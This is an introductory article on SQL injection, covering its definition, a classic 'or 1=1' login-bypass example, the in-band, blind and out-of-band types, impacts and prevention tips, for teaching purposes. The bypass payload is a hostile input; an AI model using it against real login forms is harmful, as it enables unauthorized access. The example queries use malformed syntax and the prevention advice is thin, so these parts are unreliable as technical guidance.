SQL Injection(SQLi)

What is SQL Injection?

SQL injection is an attack wherein a user inserts or inputs SQL code into an application. This SQL code is subsequently transmitted to the backend database for parsing and execution. In essence, SQL injection occurs when a web application asks for user input (such as an address or name), and instead of providing the intended input, the user appends a SQL statement that the backend of the web application processes.

SQL injection is a vulnerability that arises when an attacker or user is granted the capability to manipulate SQL queries directly within a web application. This occurs when the web application forwards these SQL queries to the backend database. Databases are commonly targeted for injection via applications like websites, which accept user input and then perform database lookups based on that input.

How is SQLi performed?

SQL serves as the universal language for interacting with various database servers like MySQL, Sybase, and Microsoft SQL Server. SQL injection vulnerabilities can arise when web application developers neglect to validate values obtained from sources like forms or input parameters before incorporating them into SQL queries destined for execution on the database server.

In order to execute a successful SQL injection attack, the user initially needs to identify susceptible user inputs within the web application.

For example; if a Person named Kartik wants to log in to the website, he will go to the login page and enter their username and password. This information is then sent to the web server, which will construct an SQL query, and this query is sent to the database server.

SELECT ID FROM Users
WHERE username: 'Kartik' and password: 'kartik@123'        

SQL then performs a true or false comparison for the values passed in the SQL query. We can deceive the database into thinking that we have achieved successful authentication by introducing an OR condition to the password.

SELECT ID FROM Users
WHERE username: 'Kartik' and password: 'xyz' or 1=1        

This is referred to as SQL injection. In this scenario, "xyz" is not Kartik's password. Consequently, the database server will proceed to evaluate the second condition, which is "1=1." This condition is true because 1 does indeed equal 1. As a result, the ID will be transmitted back to the application, successfully authenticating the user.

Some of the most commonly used SQL commands:

Types of SQL-Injection

In-band SQL Injection:

The attacker employs the same communication channel both for executing their attacks and retrieving the outcomes. In-band SQL injection, owing to its simplicity and effectiveness, stands as one of the most prevalent types of SQL injection attacks. It is further divided into two:

• Error-based SQL injection: In this method, the attacker conducts specific actions that trigger the database to produce error messages. By analyzing these error messages, it becomes possible to determine details like the database in use, the server version where the handlers are located, and more.
• Union-based SQL injection: In this approach, the UNION SQL operator is employed to amalgamate the results of two or more select statements generated by the database into a single HTTP response. You can craft these queries within the URL or combine multiple statements within input fields to attempt generating a response.

Inferential SQL Injection:

The attacker transmits data payloads to the server and monitors the server's response and behavior to gain insights into its structure. This approach is known as blind SQL injection because it doesn't involve the direct transfer of data from the website database to the attacker. As a result, the attacker cannot access information about the attack through in-band means.

Blind SQL injections hinge on the response and behavioral patterns of the server, which typically makes them slower to execute but potentially just as detrimental. Blind SQL injections can be categorized as follows:

• Time-delayed SQL Injection: Attackers dispatch a SQL query to the database, causing the database to pause for several seconds before responding with either a true or false outcome.
• Boolean-based SQL Injection: Attackers forward a SQL query to the database, prompting the application to yield either a true or false result in response.

Out-band SQL Injection:

Out-of-band SQL injection is conducted when the attacker is unable to use the same channel for launching the attack and gathering information or when the server's performance is inadequate for these tasks. These methods rely on the server's ability to generate DNS or HTTP requests to transmit data to the attacker. It is primarily employed as an alternative to in-band and inferential SQL injection techniques.

Impacts of SQL Injection

A successful SQL Injection attack can have very serious consequences.

• Following a successful SQL injection, the user or attacker gains access to a wealth of personal or private information stored in the database. This includes user details such as names, addresses, and card details, among others. As SQL databases house sensitive data, the compromise of confidential information is a common concern.
• SQL injection also provides hackers with an opportunity to access the administrator portal. If weak SQL commands are employed to validate and verify usernames and passwords, it may be feasible for an intruder to gain entry to the system as a different user.
• Entire server can be compromised
• SQL also provides the means to modify data within a database and introduce new data. For instance, in a financial application, an attacker could employ SQL injection to manipulate account balances, invalidate transactions, or divert funds to their own account.
• In certain database servers, there exists the possibility of accessing the operating system through the database server, whether by design or by chance. In such scenarios, an attacker could employ SQL injection as the initial point of entry and subsequently target the internal network situated behind a firewall.

Measures to prevent SQL Injection

A developer should employ authentication to verify input based on both its type and predefined length.

• Utilize regular expressions for structured data to ensure robust input validation.
• Ensure that all inputs are validated.
• While crafting SQL queries, be vigilant about eliminating potential code elements.
• As a best practice, some teams opt to disable the display of database errors on production websites.

References

1. www.geeksforgeeks.org
2. www.kaspersky.com
3. avinetworks.com
4. www.imperva.com
5. portswigger.net
6. www.acunetix.com
7. www.simplilearn.com
8. www.rapid7.com
9. www.synopsys.com
10. www.scaler.com